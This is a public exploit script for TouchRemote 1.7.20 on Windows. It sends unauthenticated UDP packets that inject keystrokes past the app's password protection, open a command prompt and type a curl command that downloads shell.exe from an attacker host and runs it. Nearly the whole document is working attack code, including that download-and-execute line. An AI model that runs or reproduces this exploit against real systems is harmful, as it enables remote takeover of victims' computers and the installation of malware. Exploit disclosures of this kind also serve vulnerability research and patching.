# Exploit Title: TouchRemote 1.7.20 - Remote Code Execution # Date: 30/06/25 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://touchremote.eu/ # Software Link: https://touchremote.eu/download.php/?file=windows_latest # Version: 1.7.20 # Tested on: Windows 10 ''' This exploit targets a flaw in TouchRemote for Windows where an unauthenticated attacker can simulate keystrokes over UDP despite the presence of a password protection feature. Even when a password is set, the application fails to enforce it properly, allowing remote command execution and payload delivery without user interaction. ''' import socket import time TARGET_IP = "192.168.8.101" TARGET_PORT = 8888 LHOST = "192.168.8.100" PAYLOAD = "shell.exe" def build_packet(payload: str) -> bytes: length = len(payload) header = b"\x00\x00\x00\x00" + length.to_bytes(1, 'big') + b"\x00\x00\x00\x00" return header + payload.encode() sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: print("[*] Starting TouchRemote key injection ...\n") print("[+] Handshake: Sending HELLO packet...") sock.sendto(b"\x00\x00\x00\x00\x19\x00\x00\x00\x00HELLO TOUCHREMOTE SERVER?", (TARGET_IP, TARGET_PORT)) time.sleep(0.6) print("[+] Opening Command Prompt (WIN + cmd)...") sock.sendto(build_packet("SY.key=WIN"), (TARGET_IP, TARGET_PORT)) time.sleep(1) sock.sendto(build_packet("SY.key=cmd"), (TARGET_IP, TARGET_PORT)) time.sleep(1) sock.sendto(build_packet("SY.key=RET"), (TARGET_IP, TARGET_PORT)) time.sleep(4) print("[+] Typing payload...") curl_command = f"SY.key=curl {LHOST}/{PAYLOAD} -o C:\\Windows\\Temp\\{PAYLOAD} && C:\\Windows\\Temp\\{PAYLOAD}" sock.sendto(build_packet(curl_command), (TARGET_IP, TARGET_PORT)) time.sleep(0.6) print("[+] Executing payload...") sock.sendto(build_packet("SY.key=RET"), (TARGET_IP, TARGET_PORT)) time.sleep(0.6) print("\nPayload should now be running on the target.") except Exception as e: print(f"[-] Error: {e}") finally: sock.close()